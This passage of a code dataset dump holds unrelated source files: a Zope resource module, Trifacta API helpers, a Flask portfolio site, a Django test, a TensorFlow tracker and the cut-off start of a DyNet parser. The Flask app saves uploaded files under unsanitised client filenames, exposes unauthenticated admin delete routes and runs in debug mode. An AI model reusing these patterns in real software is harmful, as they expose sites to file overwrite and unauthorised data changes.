{\n \"HEADING\": \"heading\",\n \"EDITORIAL_NOTE\": \"editorial_note\",\n \"MINUTE\": \"minute\",\n },\n \"type_names\": type_names,\n \"current_schedule_title\": translate(TITLE_AGENDA, **kwargs),\n \"agenda_minutes_title\": translate(TITLE_AGENDA_MINUTES, **kwargs),\n \"current_schedule_items\": translate(TITLE_SCHEDULED_ITEMS, **kwargs),\n \"available_items_title\": translate(TITLE_AVAILABLE_ITEMS, **kwargs),\n \"schedule_discussions_title\": translate(TITLE_DISCUSSIONS, **kwargs),\n \"scheduled_item_context_menu_header\": translate(_(u\"Modify Item\"), \n **kwargs\n ),\n \"json_listing_url\" : \"./items/jsonlisting-schedule?include_text_records=y\",\n \"json_listing_url_meta\" : \"./items/jsonlisting-schedule?add_wf=y&include_text_records=y\",\n \"save_schedule_url\": \"./items/save-schedule\",\n \"discussions_save_url\": \"discussions/save-discussions\",\n \"discussion_items_json_url\" : \"discussions/jsonlisting-raw\",\n \"schedulable_items_json_url\" : \"./schedulable-items-json\",\n \"column_title\": translate(COLUMN_DESCRIPTION, **kwargs),\n \"column_discussion_text\": translate(COLUMN_MINUTE_TEXT, **kwargs),\n \"column_discussion_text_missing\": translate(_(u\"NO TEXT RECORD FOUND\"), **kwargs),\n \"column_discussion_edit_button\": translate(EDIT, **kwargs),\n \"column_discussions_edit_button\": translate(MINUTES, **kwargs),\n \"column_discussion_delete_button\": translate(DELETE, **kwargs),\n \"column_available_headings_title\": translate(_(u\"Select existing heading\"), **kwargs),\n \"column_type\": translate(COLUMN_TYPE, **kwargs),\n \"column_mover\": translate(COLUMN_MOVER, **kwargs),\n \"column_status\": translate(COLUMN_STATUS, **kwargs),\n \"column_status_date\": translate(COLUMN_STATUS_DATE, **kwargs),\n \"column_registry_number\": translate(COLUMN_REGISTRY_NUMBER, **kwargs),\n \"empty_agenda_message\": translate(_(u\"the agenda is empty. add items \"\n \"from below from from the available documents to the right\"),\n **kwargs),\n \"text_button_text\": translate(TYPE_EDITORIAL_NOTE, **kwargs),\n \"text_records_title\": translate(_(u\"add text records\"), **kwargs),\n \"heading_button_text\": translate(TYPE_HEADING, **kwargs),\n \"minute_button_text\": translate(TYPE_MINUTE, **kwargs),\n \"new_heading_text\": translate(_(u\"custom heading\"), **kwargs),\n \"text_action_view\": translate(VIEW, **kwargs),\n \"text_moved_by\": translate(COLUMN_MOVER, **kwargs),\n \"remove_button_text\": translate(REMOVE_ITEM, **kwargs),\n \"save_button_text\": translate(SAVE_CHANGES, **kwargs),\n \"save_and_preview_button_text\": translate(SAVE_AND_PREVIEW, **kwargs),\n \"discard_button_text\": translate(DISCARD_CHANGES, **kwargs),\n \"add_discussion_button_text\": translate(ADD_MINUTE, **kwargs),\n \"save_discussion_button_text\": translate(ADD_MINUTE, **kwargs),\n \"initial_editor_text\": translate(_(u\"change this text\"), **kwargs),\n \"delete_dialog_header\": translate(_(u\"Remove item from schedule\")),\n \"delete_dialog_text\": translate(\n _(u\"Are you sure you want to remove this item from schedule ?\"),\n **kwargs),\n \"delete_dialog_confirm\": translate(YES, **kwargs),\n \"delete_dialog_cancel\": translate(NO, **kwargs),\n \"save_dialog_header\": translate(NOTICE, **kwargs),\n \"save_dialog_empty_message\": translate(\n _(u\"No items have been scheduled. Add something then save.\"), \n **kwargs),\n \"save_dialog_confirm\": translate(OKAY, **kwargs),\n \"saving_dialog_header\": translate(WORKING, **kwargs),\n \"saving_schedule_text\": translate(_(u\"saving changes to schedule...\"), **kwargs),\n \"saving_discussions_text\": translate(_(u\"saving changes to minutes...\"), **kwargs),\n \"saving_dialog_refreshing\": translate(_(u\"reloading schedule...\"), **kwargs),\n \"saving_dialog_exception\": translate(\n _(u\"there was an error while saving the schedule\"), **kwargs),\n \"filters_no_filters_header\": translate(_(u\"no filters selected\"), **kwargs),\n \"filters_no_filters_message\": translate(\n _(u\"you did not choose any filters.\" \"select some filters then hit apply\"), \n **kwargs),\n \"filters_start_date_label\": translate(START_DATE, **kwargs),\n \"filters_end_date_label\": translate(END_DATE, **kwargs),\n \"filters_clear_label\": translate(_(u\"clear filters\"), **kwargs),\n \"filter_config\": data.get_filter_config(),\n \"filter_apply_label\": translate(_(u\"apply filters\"), **kwargs),\n \"message_no_add_rights\": translate(_(u\"this schedule is read only\"), **kwargs),\n \"text_warning\": translate(WARNING, **kwargs),\n \"text_items_dialog_header\": translate(_(u\"add text to schedule\"), **kwargs),\n \"text_dialog_confirm_action\": translate(OKAY, **kwargs),\n \"text_dialog_done_action\": translate(DONE, **kwargs),\n \"text_dialog_cancel_action\": translate(CANCEL, **kwargs),\n \"text_unsaved_changes\": translate(_(u\"Schedule has unsaved changes\"), **kwargs),\n \"text_unsaved_discussions\": translate(_(u\"Do you want to delete unsaved minute?\"), **kwargs),\n \"confirm_dialog_title\": translate(_(u\"Confirmation Required\"), **kwargs),\n \"confirm_message_delete_discussion\": translate(\n _(u\"Really remove this minute record?\"), **kwargs),\n \"message_item_not_saved\": translate(_(u\"You need to save the schedule before \"\n \"adding minutes for it to this item.\"), **kwargs),\n \"minutes_header\": translate(MINUTES, **kwargs),\n \"minutes_unsaved_agenda\": translate(_(u\"*Unsaved item. No minute records.\"), **kwargs),\n \"minutes_no_records\": translate(_(u\"No minute records\"), **kwargs),\n \"add_minutes_record\": translate(_(u\"add minutes record\"), **kwargs),\n \"minutes_edit\": translate(_(u\"Edit\"), **kwargs),\n \"minutes_loading\": translate(_(u\"Loading minutes...\"), **kwargs),\n \"minutes_loading_error\": translate(_(u\"unable to load minutes...\"), **kwargs),\n \"preview_msg_header\": translate(_(u\"agenda preview\"), **kwargs),\n \"preview_msg_generating\": translate(_(u\"generating agenda preview...\"), **kwargs),\n \"preview_msg_error\": translate(_(u\"ERROR: Could to generate preview\"), **kwargs),\n },\n \"CALENDAR_GLOBALS\": {\n \"unsaved_event\": translate(_(u\"This event is unsaved. \" \n \"Edit to make any corrections and then save it\"), **kwargs),\n \"errors_scheduler\": translate(_(u\"Please make corrections. \"\n \"The highlighted fields are required.\"), **kwargs),\n \"error_collission\": translate(_(u\"This timeslot already has another \" \n u\"event.\\n Do you want still want to add it?\"), **kwargs\n ),\n \"message_okay\": translate(OKAY, **kwargs),\n },\n }\n return globals_map.get(group_name, {})\n\nclass DynamicDirectoryFactory(object):\n \"\"\"Allows generation of static resources whose content is contextual.\n \n For example, we want some system parameters to be available to certain\n registered JavaScript resources\n \"\"\"\n \n zope.interface.implements(\n zope.publisher.interfaces.browser.IBrowserPublisher\n )\n\n def __init__(self, source, checker, name):\n self.name = name\n self.__Security_checker__ = checker\n self.language = None\n \n def __call__(self, name):\n return self\n \n def __getitem__(self, name):\n return lambda:\"/@@/%s/%s\" % (self.name, name)\n \n def publishTraverse(self, request, name):\n request.response.setHeader(\"Content-type\", \n RESOURCE_HEADERS.get(name, \"text/javascript\")\n )\n self.request = request\n self.language = get_default_language()\n return getattr(self, RESOURCE_MAPPING.get(name))\n \n def scheduler_globals(self):\n return \"\"\"var scheduler_globals = %s;\"\"\" % json.dumps(\n get_globals(\"SCHEDULER_GLOBALS\", target_language=self.language)\n )\n \n def calendar_globals(self):\n return \"\"\"var calendar_globals = %s;\"\"\" % json.dumps(\n get_globals(\"CALENDAR_GLOBALS\", target_language=self.language)\n )\n\n","sub_path":"bungeni.main/trunk/bungeni/ui/resources/dynamic.py","file_name":"dynamic.py","file_ext":"py","file_size_in_byte":13449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"241354012","text":"from trifacta.util.tfrequests import TrifactaEndpoint\n\n\ndef mk_run_job_group_request(w_ds_id):\n req = {\n \"wrangledDataset\": {\n \"id\": w_ds_id\n }\n }\n return TrifactaEndpoint('POST', '/v4/jobGroups', req)\n\n\ndef mk_get_job_status_request(job_id):\n return TrifactaEndpoint('GET', f'/v4/jobs/{job_id}/status')\n","sub_path":"trifacta-dbt/objects/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"653999593","text":"from flask import Flask,redirect,url_for,render_template,request\nimport random\nimport os,datetime\nfrom flask_sqlalchemy import SQLAlchemy\napp=Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///database.db'\ndb = SQLAlchemy(app)\n\nclass Xeber(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_img = db.Column(db.String(80))\n n_ad = db.Column(db.String(120))\n n_paragraf = db.Column(db.String(120))\n n_date = db.Column(db.String(120))\n \nclass Task(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_date = db.Column(db.String(120))\n n_ixtisas = db.Column(db.String(80))\n n_universtet = db.Column(db.String(120))\n n_haqqinda = db.Column(db.String(120))\n\nclass Emr(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_img = db.Column(db.String(80))\n n_date = db.Column(db.String(120))\n\nclass Test(db.Model):\n n_id = db.Column(db.Integer, primary_key=True)\n n_img = db.Column(db.String(80))\n n_ad = db.Column(db.String(120))\n n_adress = db.Column(db.String(120))\n n_paragraf = db.Column(db.String(120))\n n_date = db.Column(db.String(120))\n \n# db.create_all()\n# class Images:\n# def __init__(self,_id,_src):\n# self.id=_id\n# self.src=_src\n# images=[\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-1.jpg'\n \n \n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-5.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-3.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-1.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-5.jpg'\n# ),\n# Images(\n# random.randint(1,1000),\n# '../static/image/project-3.jpg'\n# ),\n# ]\n\n# class Boxs:\n# def __init__(self,_id,_year,_skill,_universty,_detail):\n# self.id=_id\n# self.year=_year\n# self.skill=_skill\n# self.universty=_universty\n# self.detail=_detail\n \n# boxs=[\n# Boxs(\n# random.randint(1,1000),\n# '2015-2019',\n# 'Computer Engineer',\n# 'Techinal universty',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# Boxs(\n# random.randint(1,1000),\n# '2021-2022',\n# 'Web-devoloper',\n# 'Pragmatech',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n \n# ] \n# class News:\n# def __init__(self,_id,_icon,_title,_detail):\n# self.id=_id\n# self.icon=_icon\n# self.title=_title\n# self.detail=_detail\n \n# news=[\n# News(\n# random.randint(1,1000),\n# 'fab fa-html5',\n# 'HTML',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# News(\n# random.randint(1,1000),\n# 'fab fa-css3-alt',\n# 'CSS',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# News(\n# random.randint(1,1000),\n# 'fab fa-bootstrap',\n# 'Bootstrap',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# News(\n# random.randint(1,1000),\n# 'fab fa-js-square',\n# 'Javascript',\n# 'Lisque persius interesset his et, in quot quidam persequeris vim, ad mea essent possim iriure.'\n# ),\n# ]\n# class Comments:\n# def __init__(self,_id,_img,_name,_adress,_paragraf,_icon):\n# self.id=_id\n# self.img=_img\n# self.name=_name\n# self.adress=_adress\n# self.paragraf=_paragraf\n# self.icon=_icon\n \n# comments=[\n# Comments(\n# random.randint(1,1000),\n# '../static/image/nurlan1.jpg ',\n# 'Dennis Jacques',\n# 'User from Baku',\n# 'Lorem ipsum dolor sit amet consectetur adipisicing elit. Magnam, reprehenderit!',\n# 'fas fa-star '\n# )\n \n \n \n# ]\n\n \n# @app.route('/',methods=['GET','POST'])\n# def hosts(): \n# return render_template('index.html',allnews=news,allboxs=boxs,allimages=images,allcomments=comments)\n \n# contact sectionun app routu \n@app.route('/',methods=['GET','POST'])\ndef add():\n butunxeberler=Xeber.query.all()\n butuntasklar=Task.query.all()\n butunemrler=Emr.query.all()\n butuntestler=Test.query.all()\n \n \n return render_template('index.html',xeberler=butunxeberler,tasklar=butuntasklar,emrler=butunemrler,testler=butuntestler)\n\nistifadeciler=[]\n@app.route('/users',methods=['GET','POST'])\n\ndef users(): \n if request.method=='POST':\n _ad=request.form['ad']\n _soyad=request.form['soyad']\n _textarea=request.form['textarea']\n\n istifadeci={\n 'ad':_ad,\n 'soyad':_soyad, \n 'textarea':_textarea\n }\n istifadeciler.append(istifadeci)\n return render_template('admin.html',users=istifadeciler)\n return render_template('admin.html')\n# what I do sectionun app routu\n@app.route('/',methods=['GET','POST'])\ndef app_index():\n butunxeberler=Xeber.query.all()\n \n return render_template('index.html',xeberler=butunxeberler) \nxeberler=[]\n@app.route('/admin',methods=['GET','POST'])\ndef admin_index():\n butunxeberler=Xeber.query.all() \n if request.method=='POST':\n file=request.files['sekil']\n seklinadi=file.filename\n file.save(os.path.join('static/uploads/',seklinadi))\n _ad=request.form['ad']\n _paragraf=request.form['paragraf']\n _seklinadi=seklinadi\n _tarix=datetime.date.today()\n xeber=Xeber(\n n_img=_seklinadi,\n n_ad=_ad,\n n_paragraf=_paragraf,\n n_date=_tarix\n )\n db.session.add(xeber)\n db.session.commit()\n return redirect('/admin')\n \n \n return render_template('admin.html',xeberler=butunxeberler) \n\n@app.route('/admin/delete/',methods=['GET','POST'])\n\ndef admin_delete(id):\n silinecekolanXeber=Xeber.query.get(id)\n db.session.delete(silinecekolanXeber)\n db.session.commit()\n return redirect('/admin')\n# Resume sectionun app routu\n@app.route('/',methods=['GET','POST'])\ndef app_indexx():\n butuntasklar=Task.query.all() \n return render_template('index.html',tasklar=butuntasklar) \nTasklar=[]\n@app.route('/nurlan',methods=['GET','POST'])\ndef admin_indexx():\n \n butuntasklar=Task.query.all() \n if request.method=='POST':\n _tarix=request.form['date']\n _ixtisas=request.form['ixtisas']\n _universtet=request.form['universtet']\n _haqqinda=request.form['haqqinda']\n \n \n \n task=Task(\n n_date=_tarix,\n n_ixtisas=_ixtisas,\n n_universtet=_universtet,\n n_haqqinda=_haqqinda\n \n )\n db.session.add(task)\n db.session.commit()\n return redirect('/nurlan')\n \n \n return render_template('admin.html',tasklar=butuntasklar) \n\n@app.route('/nurlan/delete/',methods=['GET','POST'])\n\ndef nurlan_delete(id):\n silinecekolanTask=Task.query.get(id)\n db.session.delete(silinecekolanTask)\n db.session.commit()\n return redirect('/nurlan') \n# portfolo rotunu app routu\n@app.route('/',methods=['GET','POST'])\ndef app_indexxx():\n butunemrler=Emr.query.all()\n \n return render_template('index.html',emrler=butunemrler) \nemrler=[]\n@app.route('/cahan',methods=['GET','POST'])\ndef admin_indexxx():\n butunemrler=Emr.query.all() \n if request.method=='POST':\n file=request.files[\"img\"]\n seklinadi=file.filename\n file.save(os.path.join('static/uploads/',seklinadi))\n _seklinadi=seklinadi\n _tarix=datetime.date.today()\n emr=Emr(\n n_img=_seklinadi,\n n_date=_tarix\n )\n db.session.add(emr)\n db.session.commit()\n return redirect('/cahan')\n \n \n return render_template('admin.html',emrler=butunemrler) \n\n@app.route('/cahan/delete/',methods=['GET','POST'])\n\ndef cahan_delete(id):\n silinecekolanEmr=Emr.query.get(id)\n db.session.delete(silinecekolanEmr)\n db.session.commit()\n return redirect('/cahan')\n# tesmonial routu\n@app.route('/',methods=['GET','POST'])\ndef app_indexxxx():\n butuntestler=Test.query.all()\n \n return render_template('index.html',testler=butuntestler) \ntestler=[]\n@app.route('/girov',methods=['GET','POST'])\ndef admin_indexxxx():\n butuntestler=Test.query.all() \n if request.method=='POST':\n file=request.files[\"img\"]\n seklinadi=file.filename\n file.save(os.path.join('static/uploads/',seklinadi))\n _ad=request.form['ad']\n _adress=request.form['adress']\n _paragraf=request.form['paragraf']\n _seklinadi=seklinadi\n _tarix=datetime.date.today()\n \n test=Test(\n n_img=_seklinadi,\n n_ad=_ad,\n n_adress=_adress,\n n_paragraf=_paragraf,\n n_date=_tarix\n )\n db.session.add(test)\n db.session.commit()\n return redirect('/girov')\n \n \n return render_template('admin.html',testler=butuntestler) \n\n@app.route('/girov/delete/',methods=['GET','POST'])\n\ndef girov_delete(id):\n silinecekolanTest=Test.query.get(id)\n db.session.delete(silinecekolanTest)\n db.session.commit()\n return redirect('/girov') \n\nif __name__ == \"__main__\":\n app.run(port=5000,debug=True)\n","sub_path":"ProjectFrontend/My portfolio/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"323428950","text":"from django.test import TestCase\nfrom django.core.urlresolvers import reverse\n\nfrom dokumentor.models import Project\n\nclass ProjectTests(TestCase):\n\n def test_was_published_recently_with_future_question(self):\n Project.objects.create(name=\"SomeThing\", duration=0)\n project = Project.objects.get(name=\"SomeThing\")\n self.assertEqual(project.name, \"SomeThing\")\n\n def test_form_to_create_project(self):\n response = self.client.post(reverse('projects:name_step'), {'name': \"A Project name\", 'description': 'a beautiful project I started...'})\n\n projects = Project.objects.order_by('name')\n project = Project.objects.get(name=\"A Project name\")\n self.assertEqual(\"A Project name\", project.name)\n self.assertContains(response, '', status_code=302)\n\n","sub_path":"dokumentor/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"181291864","text":"import tensorflow as tf\n\nprint('Using Tensorflow ' + tf.__version__)\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\nfrom src.visualization import show_frame\nimport src.global_instance as glo_ins\nimport src.finetune as finetune\nimport src.ConvNetValue_Class as cnvc\n\nimport src.new_SampsPool_Class as new_sp\nimport src.samples_from_one_image as sfoi\nimport src.get_samps_and_labels_batch as gsalb\n\nimport tracemalloc\n\n# gpu_device = 2\n# os.environ['CUDA_VISIBLE_DEVICES'] = '{}'.format(gpu_device)\n\n# read default parameters and override with custom ones\ndef tracker(hp, run, design, env, samples_d, finetune_d, frame_name_list, pos_x, pos_y, target_w, target_h, final_score_sz, filename, image,\n templates_z, scores, start_frame, samples_pool_t, pos_x_ph, pos_y_ph, z_sz_ph, x_sz0_ph, x_sz1_ph, x_sz2_ph):\n\n # TODO: <> tracemalloc\n tracemalloc.start()\n num_frames = np.size(frame_name_list)\n\n # TODO: <> if num_frame is > threshold we should separate the tf.Session and reset the default graph\n # stores tracker's output for evaluation\n bboxes = np.zeros((num_frames, 4))\n\n scale_factors = hp.scale_step ** np.linspace(-np.ceil(hp.scale_num / 2), np.ceil(hp.scale_num / 2), hp.scale_num)\n # cosine window to penalize large displacements\n hann_1d = np.expand_dims(np.hanning(final_score_sz), axis=0)\n penalty = np.transpose(hann_1d) * hann_1d\n penalty = penalty / np.sum(penalty)\n\n context = design.context * (target_w + target_h)\n z_sz = np.sqrt(np.prod((target_w + context) * (target_h + context)))\n x_sz = float(design.search_sz) / design.exemplar_sz * z_sz\n\n # thresholds to saturate patches shrinking/growing\n min_z = hp.scale_min * z_sz\n max_z = hp.scale_max * z_sz\n min_x = hp.scale_min * x_sz\n max_x = hp.scale_max * x_sz\n\n # run_metadata = tf.RunMetadata()\n # run_opts = {\n # 'options': tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE),\n # 'run_metadata': run_metadata,\n # }\n\n run_opts = {}\n\n # with tf.Session(config=tf.ConfigProto(log_device_placement=True)) as sess:\n with tf.Session() as sess:\n tf.global_variables_initializer().run()\n # Coordinate the loading of image files.\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(coord=coord)\n\n # save first frame position (from ground-truth)\n bboxes[0, :] = pos_x - target_w / 2, pos_y - target_h / 2, target_w, target_h\n\n image_, templates_z_ = sess.run([image, templates_z], feed_dict={\n pos_x_ph: pos_x,\n pos_y_ph: pos_y,\n z_sz_ph: z_sz,\n\n filename: frame_name_list[0]})\n new_templates_z_ = templates_z_\n\n bbox_first_tl = bboxes[0]\n\n # TODO: <> samps pool\n if samples_pool_t==None:\n samples_pool_t = new_sp.NewSampsPool(samples_d)\n image_2, pos_samples_info, neg_samples_info = sfoi.get_samples_from_image(image_, bbox_first_tl,\n samples_d.POS_PER_FRAME,\n samples_d.NEG_PER_FRAME)\n samples_pool_t.add_samples(image_2, pos_samples_info, neg_samples_info)\n\n t_start = time.time()\n\n # TODO: <> time monitor\n #glo_ins.set_val(\"start_time_monitor\", time.time())\n\n # Get an image from the queue\n for i in range(1, num_frames):\n\n scaled_exemplar = z_sz * scale_factors\n scaled_search_area = x_sz * scale_factors\n scaled_target_w = target_w * scale_factors\n scaled_target_h = target_h * scale_factors\n image_, scores_ = sess.run(\n [image, scores],\n feed_dict={\n pos_x_ph: pos_x,\n pos_y_ph: pos_y,\n x_sz0_ph: scaled_search_area[0],\n x_sz1_ph: scaled_search_area[1],\n x_sz2_ph: scaled_search_area[2],\n templates_z: np.squeeze(templates_z_),\n filename: frame_name_list[i],\n }, **run_opts)\n new_scale_id = np.argmax(np.amax(scores_, axis=(1, 2)))\n\n scores_ = np.squeeze(scores_)\n # penalize change of scale\n scores_[0, :, :] = hp.scale_penalty * scores_[0, :, :]\n scores_[2, :, :] = hp.scale_penalty * scores_[2, :, :]\n # find scale with highest peak (after penalty)\n\n # update scaled sizes\n x_sz = (1 - hp.scale_lr) * x_sz + hp.scale_lr * scaled_search_area[new_scale_id]\n target_w = (1 - hp.scale_lr) * target_w + hp.scale_lr * scaled_target_w[new_scale_id]\n target_h = (1 - hp.scale_lr) * target_h + hp.scale_lr * scaled_target_h[new_scale_id]\n # select response with new_scale_id\n score_ = scores_[new_scale_id, :, :]\n score_ = score_ - np.min(score_)\n score_ = score_ / np.sum(score_)\n # apply displacement penalty\n score_ = (1 - hp.window_influence) * score_ + hp.window_influence * penalty\n pos_x, pos_y = _update_target_position(pos_x, pos_y, score_, final_score_sz, design.tot_stride,\n design.search_sz, hp.response_up, x_sz)\n\n # convert to and save output\n # TODO: <> bboxes here have top-left position\n bboxes[i, :] = pos_x - target_w / 2, pos_y - target_h / 2, target_w, target_h\n\n\n # TODO <> params\n frame_index = i\n SAMPS_EPOCH = design.SAMPLES_EPOCH\n FINETUNE_EPOCH = design.FINETUNE_EPOCH\n # params\n if not frame_index % SAMPS_EPOCH:\n image_2, pos_samples_info, neg_samples_info = sfoi.get_samples_from_image(image_, bboxes[frame_index],\n samples_d.POS_PER_FRAME,\n samples_d.NEG_PER_FRAME)\n samples_pool_t.add_samples(image_2, pos_samples_info, neg_samples_info)\n\n if not frame_index % FINETUNE_EPOCH:\n batch_samps, batch_labels = gsalb.get_samps_and_lables_batch(samples_pool_t, (samples_d.batch_pos_size, samples_d.batch_neg_size))\n\n # TODO: <> carry out fine-tune process\n finetune.complete_fintune(batch_samps, batch_labels, env, design)\n # TODO <> debug? should you update matconvnet here?\n '''\n glo_ins.set_val(\"instance\", cnvc.ConvNetValue().update_value())\n filename, image, templates_z, scores, pos_x_ph, pos_y_ph, \\\n z_sz_ph, x_sz0_ph, x_sz1_ph, x_sz2_ph = siam.build_tracking_graph(final_score_sz, design)\n '''\n # update the target representation with a rolling average\n if hp.z_lr > 0:\n new_templates_z_ = sess.run([templates_z], feed_dict={\n pos_x_ph: pos_x,\n pos_y_ph: pos_y,\n z_sz_ph: z_sz,\n #frame_index_ph: frame_index,\n image: image_\n })\n\n templates_z_ = (1 - hp.z_lr) * np.asarray(templates_z_) + hp.z_lr * np.asarray(new_templates_z_)\n\n # update template patch size\n z_sz = (1 - hp.scale_lr) * z_sz + hp.scale_lr * scaled_exemplar[new_scale_id]\n\n if run.visualization:\n show_frame(image_, bboxes[i, :], 1)\n # debug:\n #sess.graph.finalize()\n\n t_elapsed = time.time() - t_start\n speed = num_frames / t_elapsed\n\n # Finish off the filename queue coordinator.\n coord.request_stop()\n coord.join(threads)\n\n\n # from tensorflow.python.client import timeline\n # trace = timeline.Timeline(step_stats=run_metadata.step_stats)\n # trace_file = open('timeline-search.ctf.json', 'w')\n # trace_file.write(trace.generate_chrome_trace_format())\n snapshot = tracemalloc.take_snapshot()\n top_stats = snapshot.statistics(\"lineno\")\n del samples_pool_t\n for line in top_stats[:10]:\n print(\"===================================================\",line)\n\n plt.close('all')\n #print(\"num_frames\",num_frames)\n #return bboxes, speed, samples_pool_t\n return bboxes, speed\n\n\ndef _update_target_position(pos_x, pos_y, score, final_score_sz, tot_stride, search_sz, response_up, x_sz):\n # find location of score maximizer\n p = np.asarray(np.unravel_index(np.argmax(score), np.shape(score)))\n # displacement from the center in search area final representation ...\n center = float(final_score_sz - 1) / 2\n disp_in_area = p - center\n # displacement from the center in instance crop\n disp_in_xcrop = disp_in_area * float(tot_stride) / response_up\n # displacement from the center in instance crop (in frame coordinates)\n disp_in_frame = disp_in_xcrop * x_sz / search_sz\n # *position* within frame in frame coordinates\n pos_y, pos_x = pos_y + disp_in_frame[0], pos_x + disp_in_frame[1]\n return pos_x, pos_y\n\ndef time_monitor():\n TIME_THRESHOLD = 5\n # TODO: <> to check time in global dict. if time_gap > threshold, reset the graph\n now_time_monitor = time.time()\n gap_time_monitor = now_time_monitor - glo_ins.get_val(\"start_time_monitor\")\n if gap_time_monitor >= TIME_THRESHOLD:\n # reset tf.Graph()\n glo_ins.set_val(\"start_time_monitor\", now_time_monitor)\n return True\n return False\n\n\n\n","sub_path":"src/tracker.py","file_name":"tracker.py","file_ext":"py","file_size_in_byte":9677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"430092603","text":"# coding=utf-8\nfrom dynet import *\nimport dynet\nfrom utils import read_conll, write_conll, load_embeddings_file\nfrom operator import itemgetter\nimport utils, time, random, decoder\nimport numpy as np\nfrom mnnl import FFSequencePredictor, Layer, RNNSequencePredictor, BiRNNSequencePredictor\n\n\nclass jPosDepLearner:\n def __init__(self, vocab, pos, rels, w2i, c2i, m2i, t2i, morph_dict, options):\n self.model = ParameterCollection()\n random.seed(1)\n self.trainer = AdamTrainer(self.model)\n #if options.learning_rate is not None:\n # self.trainer = AdamTrainer(self.model, alpha=options.learning_rate)\n # print(\"Adam initial learning rate:\", options.learning_rate)\n self.activations = {'tanh': tanh, 'sigmoid': logistic, 'relu': rectify,\n 'tanh3': (lambda x: tanh(cwise_multiply(cwise_multiply(x, x), x)))}\n self.activation = self.activations[options.activation]\n\n self.blstmFlag = options.blstmFlag\n self.labelsFlag = options.labelsFlag\n self.costaugFlag = options.costaugFlag\n self.bibiFlag = options.bibiFlag\n self.morphFlag = options.morphFlag\n self.goldMorphFlag = options.goldMorphFlag\n self.morphTagFlag = options.morphTagFlag\n self.goldMorphTagFlag = options.goldMorphTagFlag\n self.lowerCase = options.lowerCase\n self.mtag_encoding_composition_type = options.mtag_encoding_composition_type\n self.morph_encoding_composition_type = options.morph_encoding_composition_type\n self.pos_encoding_composition_type = options.pos_encoding_composition_type\n\n self.pos_wsum_composition_alpha = options.pos_wsum_composition_alpha\n self.mtag_wsum_composition_alpha = options.mtag_wsum_composition_alpha\n self.morph_wsum_composition_alpha = options.morph_wsum_composition_alpha\n\n self.ldims = options.lstm_dims\n self.wdims = options.wembedding_dims\n self.mdims = options.membedding_dims\n self.tdims = options.tembedding_dims\n self.cdims = options.cembedding_dims\n self.layers = options.lstm_layers\n self.wordsCount = vocab\n self.vocab = {word: ind + 3 for word, ind in iter(w2i.items())}\n self.pos = {word: ind for ind, word in enumerate(pos)}\n self.id2pos = {ind: word for ind, word in enumerate(pos)}\n self.c2i = c2i\n self.m2i = m2i\n self.t2i = t2i\n self.i2t = {t2i[i]:i for i in self.t2i}\n self.morph_dict = morph_dict\n self.rels = {word: ind for ind, word in enumerate(rels)}\n self.irels = rels\n self.pdims = options.pembedding_dims\n self.tagging_attention_size = options.tagging_att_size\n\n self.vocab['*PAD*'] = 1\n self.vocab['*INITIAL*'] = 2\n self.wlookup = self.model.add_lookup_parameters((len(vocab) + 3, self.wdims))\n self.clookup = self.model.add_lookup_parameters((len(c2i), self.cdims))\n self.plookup = self.model.add_lookup_parameters((len(pos), self.pdims))\n self.ext_embeddings = None\n\n if options.external_embedding != \"NONE\":\n ext_embeddings, ext_emb_dim = {}, 100\n #load_embeddings_file(options.external_embedding, lower=self.lowerCase, type=options.external_embedding_type)\n assert (ext_emb_dim == self.wdims)\n print(\"Initializing word embeddings by pre-trained vectors\")\n count = 0\n for word in self.vocab:\n if word in ext_embeddings:\n count += 1\n self.wlookup.init_row(self.vocab[word], ext_embeddings[word])\n self.ext_embeddings = ext_embeddings\n print(\"Vocab size: %d; #words having pretrained vectors: %d\" % (len(self.vocab), count))\n\n self.morph_dims = 2*2*self.mdims if self.morphFlag else 0\n self.mtag_dims = 2*self.tdims if self.morphTagFlag else 0\n self.pos_builders = [VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims, self.ldims, self.model)]\n self.pos_bbuilders = [VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model)]\n\n if self.bibiFlag:\n self.builders = [VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model),\n VanillaLSTMBuilder(1, self.wdims + self.cdims * 2 + self.morph_dims + self.mtag_dims + self.pdims, self.ldims, self.model)]\n self.bbuilders = [VanillaLSTMBuilder(1, self.ldims * 2, self.ldims, self.model),\n 